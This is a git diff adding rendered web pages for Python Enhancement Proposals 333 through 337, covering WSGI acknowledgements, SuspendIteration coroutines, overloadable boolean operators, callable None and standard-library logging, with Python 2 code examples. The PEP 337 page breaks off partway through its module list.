Thanks go to the many folks on the Web-SIG mailing list whose +thoughtful feedback made this revised draft possible. Especially:

+
    +
  • Gregory “Grisha” Trubetskoy, author of mod_python, who beat up +on the first draft as not offering any advantages over “plain old +CGI”, thus encouraging me to look for a better approach.
  • +
  • Ian Bicking, who helped nag me into properly specifying the +multithreading and multiprocess options, as well as badgering me to +provide a mechanism for servers to supply custom extension data to +an application.
  • +
  • Tony Lownds, who came up with the concept of a start_response +function that took the status and headers, returning a write +function. His input also guided the design of the exception handling +facilities, especially in the area of allowing for middleware that +overrides application error messages.
  • +
  • Alan Kennedy, whose courageous attempts to implement WSGI-on-Jython +(well before the spec was finalized) helped to shape the “supporting +older versions of Python” section, as well as the optional +wsgi.file_wrapper facility.
  • +
  • Mark Nottingham, who reviewed the spec extensively for issues with +HTTP RFC compliance, especially with regard to HTTP/1.1 features that +I didn’t even know existed until he pointed them out.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0333.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0334/index.html b/pep-0334/index.html new file mode 100644 index 00000000000..d060c12836a --- /dev/null +++ b/pep-0334/index.html @@ -0,0 +1,522 @@ + + + + + + + + PEP 334 – Simple Coroutines via SuspendIteration | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 334 – Simple Coroutines via SuspendIteration

+
+
Author:
+
Clark C. Evans <cce at clarkevans.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
26-Aug-2004
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Asynchronous application frameworks such as Twisted [1] and Peak +[2], are based on a cooperative multitasking via event queues or +deferred execution. While this approach to application development +does not involve threads and thus avoids a whole class of problems +[3], it creates a different sort of programming challenge. When an +I/O operation would block, a user request must suspend so that other +requests can proceed. The concept of a coroutine [4] promises to +help the application developer grapple with this state management +difficulty.

+

This PEP proposes a limited approach to coroutines based on an +extension to the iterator protocol. Currently, an iterator may +raise a StopIteration exception to indicate that it is done producing +values. This proposal adds another exception to this protocol, +SuspendIteration, which indicates that the given iterator may have +more values to produce, but is unable to do so at this time.

+
+
+

Rationale

+

There are two current approaches to bringing co-routines to Python. +Christian Tismer’s Stackless [6] involves a ground-up restructuring +of Python’s execution model by hacking the ‘C’ stack. While this +approach works, its operation is hard to describe and keep portable. A +related approach is to compile Python code to Parrot [7], a +register-based virtual machine, which has coroutines. Unfortunately, +neither of these solutions is portable with IronPython (CLR) or Jython +(JavaVM).

+

It is thought that a more limited approach, based on iterators, could +provide a coroutine facility to application programmers and still be +portable across runtimes.

+
    +
  • Iterators keep their state in local variables that are not on the +“C” stack. Iterators can be viewed as classes, with state stored in +member variables that are persistent across calls to its next() +method.
  • +
  • While an uncaught exception may terminate a function’s execution, an +uncaught exception need not invalidate an iterator. The proposed +exception, SuspendIteration, uses this feature. In other words, +just because one call to next() results in an exception does not +necessarily need to imply that the iterator itself is no longer +capable of producing values.
  • +
+

There are four places where this new exception impacts:

+
    +
  • The PEP 255 simple generator mechanism could be extended to safely +‘catch’ this SuspendIteration exception, stuff away its current +state, and pass the exception on to the caller.
  • +
  • Various iterator filters [9] in the standard library, such as +itertools.izip should be made aware of this exception so that it can +transparently propagate SuspendIteration.
  • +
  • Iterators generated from I/O operations, such as a file or socket +reader, could be modified to have a non-blocking variety. This +option would raise a subclass of SuspendIteration if the requested +operation would block.
  • +
  • The asyncore library could be updated to provide a basic ‘runner’ +that pulls from an iterator; if the SuspendIteration exception is +caught, then it moves on to the next iterator in its runlist [10]. +External frameworks like Twisted would provide alternative +implementations, perhaps based on FreeBSD’s kqueue or Linux’s epoll.
  • +
+

While these may seem dramatic changes, it is a very small amount of +work compared with the utility provided by continuations.

+
+
+

Semantics

+

This section will explain, at a high level, how the introduction of +this new SuspendIteration exception would behave.

+
+

Simple Iterators

+

The current functionality of iterators is best seen with a simple +example which produces two values ‘one’ and ‘two’.

+
class States:
+
+    def __iter__(self):
+        self._next = self.state_one
+        return self
+
+    def next(self):
+        return self._next()
+
+    def state_one(self):
+        self._next = self.state_two
+        return "one"
+
+    def state_two(self):
+        self._next = self.state_stop
+        return "two"
+
+    def state_stop(self):
+        raise StopIteration
+
+print list(States())
+
+
+

An equivalent iteration could, of course, be created by the +following generator:

+
def States():
+    yield 'one'
+    yield 'two'
+
+print list(States())
+
+
+
+
+

Introducing SuspendIteration

+

Suppose that between producing ‘one’ and ‘two’, the generator above +could block on a socket read. In this case, we would want to raise +SuspendIteration to signal that the iterator is not done producing, +but is unable to provide a value at the current moment.

+
from random import randint
+from time import sleep
+
+class SuspendIteration(Exception):
+      pass
+
+class NonBlockingResource:
+
+    """Randomly unable to produce the second value"""
+
+    def __iter__(self):
+        self._next = self.state_one
+        return self
+
+    def next(self):
+        return self._next()
+
+    def state_one(self):
+        self._next = self.state_suspend
+        return "one"
+
+    def state_suspend(self):
+        rand = randint(1,10)
+        if 2 == rand:
+            self._next = self.state_two
+            return self.state_two()
+        raise SuspendIteration()
+
+    def state_two(self):
+        self._next = self.state_stop
+        return "two"
+
+    def state_stop(self):
+        raise StopIteration
+
+def sleeplist(iterator, timeout = .1):
+    """
+    Do other things (e.g. sleep) while resource is
+    unable to provide the next value
+    """
+    it = iter(iterator)
+    retval = []
+    while True:
+        try:
+            retval.append(it.next())
+        except SuspendIteration:
+            sleep(timeout)
+            continue
+        except StopIteration:
+            break
+    return retval
+
+print sleeplist(NonBlockingResource())
+
+
+

In a real-world situation, the NonBlockingResource would be a file +iterator, socket handle, or other I/O based producer. The sleeplist +would instead be an async reactor, such as those found in asyncore or +Twisted. The non-blocking resource could, of course, be written as a +generator:

+
def NonBlockingResource():
+    yield "one"
+    while True:
+        rand = randint(1,10)
+        if 2 == rand:
+            break
+        raise SuspendIteration()
+    yield "two"
+
+
+

It is not necessary to add a keyword, ‘suspend’, since most real +content generators will not be in application code, they will be in +low-level I/O based operations. Since most programmers need not be +exposed to the SuspendIteration() mechanism, a keyword is not needed.

+
+
+

Application Iterators

+

The previous example is rather contrived, a more ‘real-world’ example +would be a web page generator which yields HTML content, and pulls +from a database. Note that this is an example of neither the +‘producer’ nor the ‘consumer’, but rather of a filter.

+
def ListAlbums(cursor):
+    cursor.execute("SELECT title, artist FROM album")
+    yield '<html><body><table><tr><td>Title</td><td>Artist</td></tr>'
+    for (title, artist) in cursor:
+        yield '<tr><td>%s</td><td>%s</td></tr>' % (title, artist)
+    yield '</table></body></html>'
+
+
+

The problem, of course, is that the database may block for some time +before any rows are returned, and that during execution, rows may be +returned in blocks of 10 or 100 at a time. Ideally, if the database +blocks for the next set of rows, another user connection could be +serviced. Note the complete absence of SuspendIterator in the above +code. If done correctly, application developers would be able to +focus on functionality rather than concurrency issues.

+

The iterator created by the above generator should do the magic +necessary to maintain state, yet pass the exception through to a +lower-level async framework. Here is an example of what the +corresponding iterator would look like if coded up as a class:

+
class ListAlbums:
+
+    def __init__(self, cursor):
+        self.cursor = cursor
+
+    def __iter__(self):
+        self.cursor.execute("SELECT title, artist FROM album")
+        self._iter = iter(self._cursor)
+        self._next = self.state_head
+        return self
+
+    def next(self):
+        return self._next()
+
+    def state_head(self):
+        self._next = self.state_cursor
+        return "<html><body><table><tr><td>\
+                Title</td><td>Artist</td></tr>"
+
+    def state_tail(self):
+        self._next = self.state_stop
+        return "</table></body></html>"
+
+    def state_cursor(self):
+        try:
+            (title,artist) = self._iter.next()
+            return '<tr><td>%s</td><td>%s</td></tr>' % (title, artist)
+        except StopIteration:
+            self._next = self.state_tail
+            return self.next()
+        except SuspendIteration:
+            # just pass-through
+            raise
+
+    def state_stop(self):
+        raise StopIteration
+
+
+
+
+

Complicating Factors

+

While the above example is straightforward, things are a bit more +complicated if the intermediate generator ‘condenses’ values, that is, +it pulls in two or more values for each value it produces. For +example,

+
def pair(iterLeft,iterRight):
+    rhs = iter(iterRight)
+    lhs = iter(iterLeft)
+    while True:
+       yield (rhs.next(), lhs.next())
+
+
+

In this case, the corresponding iterator behavior has to be a bit more +subtle to handle the case of either the right or left iterator raising +SuspendIteration. It seems to be a matter of decomposing the +generator to recognize intermediate states where a SuspendIterator +exception from the producing context could happen.

+
class pair:
+
+    def __init__(self, iterLeft, iterRight):
+        self.iterLeft = iterLeft
+        self.iterRight = iterRight
+
+    def __iter__(self):
+        self.rhs = iter(iterRight)
+        self.lhs = iter(iterLeft)
+        self._temp_rhs = None
+        self._temp_lhs = None
+        self._next = self.state_rhs
+        return self
+
+    def next(self):
+        return self._next()
+
+    def state_rhs(self):
+        self._temp_rhs = self.rhs.next()
+        self._next = self.state_lhs
+        return self.next()
+
+    def state_lhs(self):
+        self._temp_lhs = self.lhs.next()
+        self._next = self.state_pair
+        return self.next()
+
+    def state_pair(self):
+        self._next = self.state_rhs
+        return (self._temp_rhs, self._temp_lhs)
+
+
+

This proposal assumes that a corresponding iterator written using +this class-based method is possible for existing generators. The +challenge seems to be the identification of distinct states within +the generator where suspension could occur.

+
+
+

Resource Cleanup

+

The current generator mechanism has a strange interaction with +exceptions where a ‘yield’ statement is not allowed within a +try/finally block. The SuspendIterator exception provides another +similar issue. The impacts of this issue are not clear. However it +may be that re-writing the generator into a state machine, as the +previous section did, could resolve this issue allowing for the +situation to be no-worse than, and perhaps even removing the +yield/finally situation. More investigation is needed in this area.

+
+
+

API and Limitations

+

This proposal only covers ‘suspending’ a chain of iterators, and does +not cover (of course) suspending general functions, methods, or “C” +extension function. While there could be no direct support for +creating generators in “C” code, native “C” iterators which comply +with the SuspendIterator semantics are certainly possible.

+
+
+
+

Low-Level Implementation

+

The author of the PEP is not yet familiar with the Python execution +model to comment in this area.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0334.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0335/index.html b/pep-0335/index.html new file mode 100644 index 00000000000..5b4d1ba0874 --- /dev/null +++ b/pep-0335/index.html @@ -0,0 +1,657 @@ + + + + + + + + PEP 335 – Overloadable Boolean Operators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 335 – Overloadable Boolean Operators

+
+
Author:
+
Gregory Ewing <greg.ewing at canterbury.ac.nz>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
29-Aug-2004
+
Python-Version:
+
3.3
+
Post-History:
+
05-Sep-2004, 30-Sep-2011, 25-Oct-2011
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP was rejected. +See https://mail.python.org/pipermail/python-dev/2012-March/117510.html

+
+
+

Abstract

+

This PEP proposes an extension to permit objects to define their own +meanings for the boolean operators ‘and’, ‘or’ and ‘not’, and suggests +an efficient strategy for implementation. A prototype of this +implementation is available for download.

+
+
+

Background

+

Python does not currently provide any ‘__xxx__’ special methods +corresponding to the ‘and’, ‘or’ and ‘not’ boolean operators. In the +case of ‘and’ and ‘or’, the most likely reason is that these operators +have short-circuiting semantics, i.e. the second operand is not +evaluated if the result can be determined from the first operand. The +usual technique of providing special methods for these operators +therefore would not work.

+

There is no such difficulty in the case of ‘not’, however, and it +would be straightforward to provide a special method for this +operator. The rest of this proposal will therefore concentrate mainly +on providing a way to overload ‘and’ and ‘or’.

+
+
+

Motivation

+

There are many applications in which it is natural to provide custom +meanings for Python operators, and in some of these, having boolean +operators excluded from those able to be customised can be +inconvenient. Examples include:

+
    +
  1. NumPy, in which almost all the operators are defined on +arrays so as to perform the appropriate operation between +corresponding elements, and return an array of the results. For +consistency, one would expect a boolean operation between two +arrays to return an array of booleans, but this is not currently +possible.

    There is a precedent for an extension of this kind: comparison +operators were originally restricted to returning boolean results, +and rich comparisons were added so that comparisons of NumPy +arrays could return arrays of booleans.

    +
  2. +
  3. A symbolic algebra system, in which a Python expression is +evaluated in an environment which results in it constructing a tree +of objects corresponding to the structure of the expression.
  4. +
  5. A relational database interface, in which a Python expression is +used to construct an SQL query.
  6. +
+

A workaround often suggested is to use the bitwise operators ‘&’, ‘|’ +and ‘~’ in place of ‘and’, ‘or’ and ‘not’, but this has some +drawbacks:

+
    +
  • The precedence of these is different in relation to the other operators, +and they may already be in use for other purposes (as in example 1).
  • +
  • It is aesthetically displeasing to force users to use something other +than the most obvious syntax for what they are trying to express. This +would be particularly acute in the case of example 3, considering that +boolean operations are a staple of SQL queries.
  • +
  • Bitwise operators do not provide a solution to the problem of +chained comparisons such as ‘a < b < c’ which involve an implicit +‘and’ operation. Such expressions currently cannot be used at all +on data types such as NumPy arrays where the result of a comparison +cannot be treated as having normal boolean semantics; they must be +expanded into something like (a < b) & (b < c), losing a considerable +amount of clarity.
  • +
+
+
+

Rationale

+

The requirements for a successful solution to the problem of allowing +boolean operators to be customised are:

+
    +
  1. In the default case (where there is no customisation), the existing +short-circuiting semantics must be preserved.
  2. +
  3. There must not be any appreciable loss of speed in the default +case.
  4. +
  5. Ideally, the customisation mechanism should allow the object to +provide either short-circuiting or non-short-circuiting semantics, +at its discretion.
  6. +
+

One obvious strategy, that has been previously suggested, is to pass +into the special method the first argument and a function for +evaluating the second argument. This would satisfy requirements 1 and +3, but not requirement 2, since it would incur the overhead of +constructing a function object and possibly a Python function call on +every boolean operation. Therefore, it will not be considered further +here.

+

The following section proposes a strategy that addresses all three +requirements. A prototype implementation of this strategy is +available for download.

+
+
+

Specification

+
+

Special Methods

+

At the Python level, objects may define the following special methods.

+ + + + + + + + + + + + + +
UnaryBinary, phase 1Binary, phase 2
    +
  • __not__(self)
  • +
+
    +
  • __and1__(self)
  • +
  • __or1__(self)
  • +
+
    +
  • __and2__(self, other)
  • +
  • __or2__(self, other)
  • +
  • __rand2__(self, other)
  • +
  • __ror2__(self, other)
  • +
+
+

The __not__ method, if defined, implements the ‘not’ operator. If it +is not defined, or it returns NotImplemented, existing semantics are +used.

+

To permit short-circuiting, processing of the ‘and’ and ‘or’ operators +is split into two phases. Phase 1 occurs after evaluation of the first +operand but before the second. If the first operand defines the +relevant phase 1 method, it is called with the first operand as +argument. If that method can determine the result without needing the +second operand, it returns the result, and further processing is +skipped.

+

If the phase 1 method determines that the second operand is needed, it +returns the special value NeedOtherOperand. This triggers the +evaluation of the second operand, and the calling of a relevant +phase 2 method. During phase 2, the __and2__/__rand2__ and +__or2__/__ror2__ method pairs work as for other binary operators.

+

Processing falls back to existing semantics if at any stage a relevant +special method is not found or returns NotImplemented.

+

As a special case, if the first operand defines a phase 2 method but +no corresponding phase 1 method, the second operand is always +evaluated and the phase 2 method called. This allows an object which +does not want short-circuiting semantics to simply implement the +phase 2 methods and ignore phase 1.

+
+
+

Bytecodes

+

The patch adds four new bytecodes, LOGICAL_AND_1, LOGICAL_AND_2, +LOGICAL_OR_1 and LOGICAL_OR_2. As an example of their use, the +bytecode generated for an ‘and’ expression looks like this:

+
     .
+     .
+     .
+     evaluate first operand
+     LOGICAL_AND_1  L
+     evaluate second operand
+     LOGICAL_AND_2
+L:   .
+     .
+     .
+
+
+

The LOGICAL_AND_1 bytecode performs phase 1 processing. If it +determines that the second operand is needed, it leaves the first +operand on the stack and continues with the following code. Otherwise +it pops the first operand, pushes the result and branches to L.

+

The LOGICAL_AND_2 bytecode performs phase 2 processing, popping both +operands and pushing the result.

+
+
+

Type Slots

+

At the C level, the new special methods are manifested as five new +slots in the type object. In the patch, they are added to the +tp_as_number substructure, since this allows making use of some +existing code for dealing with unary and binary operators. Their +existence is signalled by a new type flag, +Py_TPFLAGS_HAVE_BOOLEAN_OVERLOAD.

+

The new type slots are:

+
unaryfunc nb_logical_not;
+unaryfunc nb_logical_and_1;
+unaryfunc nb_logical_or_1;
+binaryfunc nb_logical_and_2;
+binaryfunc nb_logical_or_2;
+
+
+
+
+

Python/C API Functions

+

There are also five new Python/C API functions corresponding to the +new operations:

+
PyObject *PyObject_LogicalNot(PyObject *);
+PyObject *PyObject_LogicalAnd1(PyObject *);
+PyObject *PyObject_LogicalOr1(PyObject *);
+PyObject *PyObject_LogicalAnd2(PyObject *, PyObject *);
+PyObject *PyObject_LogicalOr2(PyObject *, PyObject *);
+
+
+
+
+
+

Alternatives and Optimisations

+

This section discusses some possible variations on the proposal, +and ways in which the bytecode sequences generated for boolean +expressions could be optimised.

+
+

Reduced special method set

+

For completeness, the full version of this proposal includes a +mechanism for types to define their own customised short-circuiting +behaviour. However, the full mechanism is not needed to address the +main use cases put forward here, and it would be possible to +define a simplified version that only includes the phase 2 +methods. There would then only be 5 new special methods (__and2__, +__rand2__, __or2__, __ror2__, __not__) with 3 associated type slots +and 3 API functions.

+

This simplified version could be expanded to the full version +later if desired.

+
+
+

Additional bytecodes

+

As defined here, the bytecode sequence for code that branches on +the result of a boolean expression would be slightly longer than +it currently is. For example, in Python 2.7,

+
if a and b:
+    statement1
+else:
+    statement2
+
+
+

generates

+
    LOAD_GLOBAL         a
+    POP_JUMP_IF_FALSE   false_branch
+    LOAD_GLOBAL         b
+    POP_JUMP_IF_FALSE   false_branch
+    <code for statement1>
+    JUMP_FORWARD        end_branch
+false_branch:
+    <code for statement2>
+end_branch:
+
+
+

Under this proposal as described so far, it would become something like

+
    LOAD_GLOBAL         a
+    LOGICAL_AND_1       test
+    LOAD_GLOBAL         b
+    LOGICAL_AND_2
+test:
+    POP_JUMP_IF_FALSE   false_branch
+    <code for statement1>
+    JUMP_FORWARD        end_branch
+false_branch:
+    <code for statement2>
+end_branch:
+
+
+

This involves executing one extra bytecode in the short-circuiting +case and two extra bytecodes in the non-short-circuiting case.

+

However, by introducing extra bytecodes that combine the logical +operations with testing and branching on the result, it can be +reduced to the same number of bytecodes as the original:

+
    LOAD_GLOBAL         a
+    AND1_JUMP           true_branch, false_branch
+    LOAD_GLOBAL         b
+    AND2_JUMP_IF_FALSE  false_branch
+true_branch:
+    <code for statement1>
+    JUMP_FORWARD        end_branch
+false_branch:
+    <code for statement2>
+end_branch:
+
+
+

Here, AND1_JUMP performs phase 1 processing as above, +and then examines the result. If there is a result, it is popped +from the stack, its truth value is tested and a branch taken to +one of two locations.

+

Otherwise, the first operand is left on the stack and execution +continues to the next bytecode. The AND2_JUMP_IF_FALSE bytecode +performs phase 2 processing, pops the result and branches if +it tests false

+

For the ‘or’ operator, there would be corresponding OR1_JUMP +and OR2_JUMP_IF_TRUE bytecodes.

+

If the simplified version without phase 1 methods is used, then +early exiting can only occur if the first operand is false for +‘and’ and true for ‘or’. Consequently, the two-target AND1_JUMP and +OR1_JUMP bytecodes can be replaced with AND1_JUMP_IF_FALSE and +OR1_JUMP_IF_TRUE, these being ordinary branch instructions with +only one target.

+
+
+

Optimisation of ‘not’

+

Recent versions of Python implement a simple optimisation in +which branching on a negated boolean expression is implemented +by reversing the sense of the branch, saving a UNARY_NOT opcode.

+

Taking a strict view, this optimisation should no longer be +performed, because the ‘not’ operator may be overridden to produce +quite different results from usual. However, in typical use cases, +it is not envisaged that expressions involving customised boolean +operations will be used for branching – it is much more likely +that the result will be used in some other way.

+

Therefore, it would probably do little harm to specify that the +compiler is allowed to use the laws of boolean algebra to +simplify any expression that appears directly in a boolean +context. If this is inconvenient, the result can always be assigned +to a temporary name first.

+

This would allow the existing ‘not’ optimisation to remain, and +would permit future extensions of it such as using De Morgan’s laws +to extend it deeper into the expression.

+
+
+
+

Usage Examples

+
+

Example 1: NumPy Arrays

+
#-----------------------------------------------------------------
+#
+#   This example creates a subclass of numpy array to which
+#   'and', 'or' and 'not' can be applied, producing an array
+#   of booleans.
+#
+#-----------------------------------------------------------------
+
+from numpy import array, ndarray
+
+class BArray(ndarray):
+
+    def __str__(self):
+        return "barray(%s)" % ndarray.__str__(self)
+
+    def __and2__(self, other):
+        return (self & other)
+
+    def __or2__(self, other):
+        return (self & other)
+
+    def __not__(self):
+        return (self == 0)
+
+def barray(*args, **kwds):
+    return array(*args, **kwds).view(type = BArray)
+
+a0 = barray([0, 1, 2, 4])
+a1 = barray([1, 2, 3, 4])
+a2 = barray([5, 6, 3, 4])
+a3 = barray([5, 1, 2, 4])
+
+print "a0:", a0
+print "a1:", a1
+print "a2:", a2
+print "a3:", a3
+print "not a0:", not a0
+print "a0 == a1 and a2 == a3:", a0 == a1 and a2 == a3
+print "a0 == a1 or a2 == a3:", a0 == a1 or a2 == a3
+
+
+
+
+

Example 1 Output

+
a0: barray([0 1 2 4])
+a1: barray([1 2 3 4])
+a2: barray([5 6 3 4])
+a3: barray([5 1 2 4])
+not a0: barray([ True False False False])
+a0 == a1 and a2 == a3: barray([False False False  True])
+a0 == a1 or a2 == a3: barray([False False False  True])
+
+
+
+
+

Example 2: Database Queries

+
#-----------------------------------------------------------------
+#
+#   This example demonstrates the creation of a DSL for database
+#   queries allowing 'and' and 'or' operators to be used to
+#   formulate the query.
+#
+#-----------------------------------------------------------------
+
+class SQLNode(object):
+
+    def __and2__(self, other):
+        return SQLBinop("and", self, other)
+
+    def __rand2__(self, other):
+        return SQLBinop("and", other, self)
+
+    def __eq__(self, other):
+        return SQLBinop("=", self, other)
+
+
+class Table(SQLNode):
+
+    def __init__(self, name):
+        self.__tablename__ = name
+
+    def __getattr__(self, name):
+        return SQLAttr(self, name)
+
+    def __sql__(self):
+        return self.__tablename__
+
+
+class SQLBinop(SQLNode):
+
+    def __init__(self, op, opnd1, opnd2):
+        self.op = op.upper()
+        self.opnd1 = opnd1
+        self.opnd2 = opnd2
+
+    def __sql__(self):
+        return "(%s %s %s)" % (sql(self.opnd1), self.op, sql(self.opnd2))
+
+
+class SQLAttr(SQLNode):
+
+    def __init__(self, table, name):
+        self.table = table
+        self.name = name
+
+    def __sql__(self):
+        return "%s.%s" % (sql(self.table), self.name)
+
+
+class SQLSelect(SQLNode):
+
+    def __init__(self, targets):
+        self.targets = targets
+        self.where_clause = None
+
+    def where(self, expr):
+        self.where_clause = expr
+        return self
+
+    def __sql__(self):
+        result = "SELECT %s" % ", ".join([sql(target) for target in self.targets])
+        if self.where_clause:
+            result = "%s WHERE %s" % (result, sql(self.where_clause))
+        return result
+
+
+def sql(expr):
+    if isinstance(expr, SQLNode):
+        return expr.__sql__()
+    elif isinstance(expr, str):
+        return "'%s'" % expr.replace("'", "''")
+    else:
+        return str(expr)
+
+
+def select(*targets):
+    return SQLSelect(targets)
+
+#-----------------------------------------------------------------
+
+dishes = Table("dishes")
+customers = Table("customers")
+orders = Table("orders")
+
+query = select(customers.name, dishes.price, orders.amount).where(
+    customers.cust_id == orders.cust_id and orders.dish_id == dishes.dish_id
+    and dishes.name == "Spam, Eggs, Sausages and Spam")
+
+print repr(query)
+print sql(query)
+
+
+
+
+

Example 2 Output

+
<__main__.SQLSelect object at 0x1cc830>
+SELECT customers.name, dishes.price, orders.amount WHERE
+(((customers.cust_id = orders.cust_id) AND (orders.dish_id =
+dishes.dish_id)) AND (dishes.name = 'Spam, Eggs, Sausages and Spam'))
+
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0335.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0336/index.html b/pep-0336/index.html new file mode 100644 index 00000000000..95ac852195a --- /dev/null +++ b/pep-0336/index.html @@ -0,0 +1,245 @@ + + + + + + + + PEP 336 – Make None Callable | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 336 – Make None Callable

+
+
Author:
+
Andrew McClelland <eternalsquire at comcast.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
28-Oct-2004
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

None should be a callable object that when called with any +arguments has no side effect and returns None.

+
+
+

BDFL Pronouncement

+

This PEP is rejected. It is considered a feature that None raises +an error when called. The proposal falls short in tests for +obviousness, clarity, explicitness, and necessity. The provided Switch +example is nice but easily handled by a simple lambda definition. +See python-dev discussion on 17 June 2005 [1].

+
+
+

Motivation

+

To allow a programming style for selectable actions that is more +in accordance with the minimalistic functional programming goals +of the Python language.

+
+
+

Rationale

+

Allow the use of None in method tables as a universal no effect +rather than either (1) checking a method table entry against None +before calling, or (2) writing a local no effect method with +arguments similar to other functions in the table.

+

The semantics would be effectively:

+
class None:
+
+    def __call__(self, *args):
+        pass
+
+
+
+
+

How To Use

+

Before, checking function table entry against None:

+
class Select:
+
+    def a(self, input):
+        print 'a'
+
+    def b(self, input):
+        print 'b'
+
+    def c(self, input):
+        print 'c'
+
+    def __call__(self, input):
+     function = { 1 : self.a,
+           2 : self.b,
+           3 : self.c
+        }.get(input, None)
+     if function:  return function(input)
+
+
+

Before, using a local no effect method:

+
class Select:
+
+    def a(self, input):
+        print 'a'
+
+    def b(self, input):
+        print 'b'
+
+    def c(self, input):
+        print 'c'
+
+    def nop(self, input):
+     pass
+
+    def __call__(self, input):
+        return { 1 : self.a,
+        2 : self.b,
+        3 : self.c
+        }.get(input, self.nop)(input)
+
+
+

After:

+
class Select:
+
+    def a(self, input):
+        print 'a'
+
+    def b(self, input):
+        print 'b'
+
+    def c(self, input):
+        print 'c'
+
+    def __call__(self, input):
+     return { 1 : self.a,
+        2 : self.b,
+        3 : self.c
+        }.get(input, None)(input)
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0336.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0337/index.html b/pep-0337/index.html new file mode 100644 index 00000000000..051cdcc1ab6 --- /dev/null +++ b/pep-0337/index.html @@ -0,0 +1,282 @@ + + + + + + + + PEP 337 – Logging Usage in the Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 337 – Logging Usage in the Standard Library

+
+
Author:
+
Michael P. Dubner <dubnerm at mindless.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
02-Oct-2004
+
Python-Version:
+
2.5
+
Post-History:
+
10-Nov-2004
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP defines a standard for using the logging system (PEP 282) in the +standard library.

+

Implementing this PEP will simplify development of daemon +applications. As a downside this PEP requires slight +modifications (however in a back-portable way) to a large number +of standard modules.

+

After implementing this PEP one can use following filtering +scheme:

+
logging.getLogger('py.BaseHTTPServer').setLevel(logging.FATAL)
+
+
+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +for lack of a current champion interested in promoting the goals of the +PEP and collecting and incorporating feedback, and with sufficient +available time to do so effectively.

+
+
+

Rationale

+

There are a couple of situations when output to stdout or stderr +is impractical:

+
    +
  • Daemon applications where the framework doesn’t allow the +redirection of standard output to some file, but assumes use of +some other form of logging. Examples are syslog under *nix’es +and EventLog under WinNT+.
  • +
  • GUI applications which want to output every new log entry in +separate pop-up window (i.e. fading OSD).
  • +
+

Also sometimes applications want to filter output entries based on +their source or severity. This requirement can’t be implemented +using simple redirection.

+

Finally sometimes output needs to be marked with event timestamps, +which can be accomplished with ease using the logging system.

+
+
+

Proposal

+

Every module usable for daemon and GUI applications should be +rewritten to use the logging system instead of print or +sys.stdout.write.

+

There should be code like this included in the beginning of every +modified module:

+
import logging
+
+_log = logging.getLogger('py.<module-name>')
+
+
+

A prefix of py. [2] must be used by all modules included in the +standard library distributed along with Python, and only by such +modules (unverifiable). The use of _log is intentional as we +don’t want to auto-export it. For modules that use log only in +one class a logger can be created inside the class definition as +follows:

+
class XXX:
+
+    __log = logging.getLogger('py.<module-name>')
+
+
+

Then this class can create access methods to log to this private +logger.

+

So print and sys.std{out|err}.write statements should be +replaced with _log.{debug|info}, and traceback.print_exception +with _log.exception or sometimes _log.debug('...', exc_info=1).

+
+
+

Module List

+

Here is a (possibly incomplete) list of modules to be reworked:

+
    +
  • asyncore (dispatcher.log, dispatcher.log_info)
  • +
  • BaseHTTPServer (BaseHTTPRequestHandler.log_request, +BaseHTTPRequestHandler.log_error, +BaseHTTPRequestHandler.log_message)
  • +
  • cgi (possibly - is cgi.log used by somebody?)
  • +
  • ftplib (if FTP.debugging)
  • +
  • gopherlib (get_directory)
  • +
  • httplib (HTTPResponse, HTTPConnection)
  • +
  • ihooks (_Verbose)
  • +
  • imaplib (IMAP4._mesg)
  • +
  • mhlib (MH.error)
  • +
  • nntplib (NNTP)
  • +
  • pipes (Template.makepipeline)
  • +
  • pkgutil (extend_path)
  • +
  • platform (_syscmd_ver)
  • +
  • poplib (if POP3._debugging)
  • +
  • profile (if Profile.verbose)
  • +
  • robotparser (_debug)
  • +
  • smtplib (if SGMLParser.verbose)
  • +
  • shlex (if shlex.debug)
  • +
  • smtpd (SMTPChannel/PureProxy where print >> DEBUGSTREAM)
  • +
  • smtplib (if SMTP.debuglevel)
  • +
  • SocketServer (BaseServer.handle_error)
  • +
  • telnetlib (if Telnet.debuglevel)
  • +
  • threading? (_Verbose._note, Thread.__bootstrap)
  • +
  • timeit (Timer.print_exc)
  • +
  • trace
  • +
  • uu (decode)
  • +
+

Additionally there are a couple of modules with commented debug +output or modules where debug output should be added. For +example:

+
    +
  • urllib
